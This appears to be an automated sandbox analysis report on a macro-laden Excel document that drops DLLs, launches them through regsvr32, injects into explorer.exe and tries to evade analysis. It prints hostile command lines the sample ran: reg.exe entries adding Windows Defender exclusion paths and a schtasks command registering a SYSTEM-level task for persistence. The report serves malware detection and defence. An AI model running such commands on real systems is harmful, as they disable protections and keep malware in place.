Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 6_2_6DE6C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBCBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 12_2_6DCBCBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBC702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 12_2_6DCBC702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 15_2_6DB0CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 15_2_6DB0C702
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Celod.wac2.25.dr Static PE information: No import functions for PE file found
Source: Celod.wac.7.dr Static PE information: No import functions for PE file found
Source: Celod.wac.17.dr Static PE information: No import functions for PE file found
Source: Celod.wac1.16.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0'
Document contains embedded VBA macros
Source: Document_748968552-10062021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Celod.wac2.25.dr Static PE information: Data appended to the last section found
Source: Celod.wac.17.dr Static PE information: Data appended to the last section found
Source: Celod.wac1.16.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: 44475.7050777778[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44475.7050777778[2].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac1.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44475.7050777778[3].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................p.,..........&8.....(.P...............................................................................................,..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.......N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Adbwawqor' /d '0'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Adbwawqor' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD661.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@33/12@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_6E01D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCB30AA StartServiceCtrlDispatcherA, 12_2_6DCB30AA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCB30AA StartServiceCtrlDispatcherA, 12_2_6DCB30AA
Source: Document_748968552-10062021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_6E01ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{DDAB7EF0-BC80-4CD4-8767-0F84BCCC1E07}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C5EE0482-80B4-45C1-874A-DA1DE38D1DCA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{319FAA35-9682-4998-839E-F081E0B05758}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{C5EE0482-80B4-45C1-874A-DA1DE38D1DCA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{319FAA35-9682-4998-839E-F081E0B05758}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{DDAB7EF0-BC80-4CD4-8767-0F84BCCC1E07}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01A55C FindResourceA, 4_2_6E01A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.489853323.00000000028E0000.00000004.00000001.sdmp
Source: Binary string: c:\Think\Evening\Plan\Base\Think.pdb source: regsvr32.exe, 00000004.00000002.489763377.000000006E083000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.582378510.000000006DED3000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.490164469.00000000028E0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E031A60 pushfd ; retf 4_2_6E031A61
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E035714 push ss; ret 4_2_6E03572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E033B85 pushad ; ret 4_2_6E033B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E0318E3 push esi; retf 4_2_6E0318EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E034DB1 pushfd ; iretd 4_2_6E034DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE84DB1 pushfd ; iretd 6_2_6DE84DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE818E3 push esi; retf 6_2_6DE818EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE83B85 pushad ; ret 6_2_6DE83B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE85714 push ss; ret 6_2_6DE8572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE81A60 pushfd ; retf 6_2_6DE81A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009A00E push ebx; ret 7_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009D485 push FFFFFF8Ah; iretd 7_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009D4B6 push FFFFFF8Ah; iretd 7_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00099D5C push cs; iretd 7_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00099E5E push cs; iretd 7_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009BB21 push esi; iretd 7_2_0009BB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD4DB1 pushfd ; iretd 12_2_6DCD4DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD18E3 push esi; retf 12_2_6DCD18EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD3B85 pushad ; ret 12_2_6DCD3B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD5714 push ss; ret 12_2_6DCD572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD1A60 pushfd ; retf 12_2_6DCD1A61
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB24DB1 pushfd ; iretd 15_2_6DB24DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB218E3 push esi; retf 15_2_6DB218EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB23B85 pushad ; ret 15_2_6DB23B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB25714 push ss; ret 15_2_6DB2572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB21A60 pushfd ; retf 15_2_6DB21A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009A00E push ebx; ret 16_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009D485 push FFFFFF8Ah; iretd 16_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009D4B6 push FFFFFF8Ah; iretd 16_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00099D5C push cs; iretd 16_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00099E5E push cs; iretd 16_2_00099E32
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01DFEF LoadLibraryA,GetProcAddress, 4_2_6E01DFEF
PE file contains an invalid checksum
Source: Celod.wac2.25.dr Static PE information: real checksum: 0x10be8f should be: 0x9861
Source: Celod.wac.7.dr Static PE information: real checksum: 0x10be8f should be: 0x111590
Source: Celod.wac.17.dr Static PE information: real checksum: 0x10be8f should be: 0x9861
Source: Celod.wac1.16.dr Static PE information: real checksum: 0x10be8f should be: 0x9861

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1 Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCB30AA StartServiceCtrlDispatcherA, 12_2_6DCB30AA

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: 9C102D value: E9 9B 4C 6C FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: 9C102D value: E9 9B 4C 6C FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 9C102D value: E9 9B 4C 74 FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 9C102D value: E9 9B 4C 71 FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2956 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2964 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 836 Thread sleep time: -144000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2556 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1704 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2932 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3008 Thread sleep count: 142 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3008 Thread sleep time: -108000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 668 Thread sleep count: 51 > 30 Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 4_2_6E01D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01AEF6 FindFirstFileW,FindNextFileW, 4_2_6E01AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6AEF6 FindFirstFileW,FindNextFileW, 6_2_6DE6AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEF6 FindFirstFileW,FindNextFileW, 7_2_0008AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBAEF6 FindFirstFileW,FindNextFileW, 12_2_6DCBAEF6
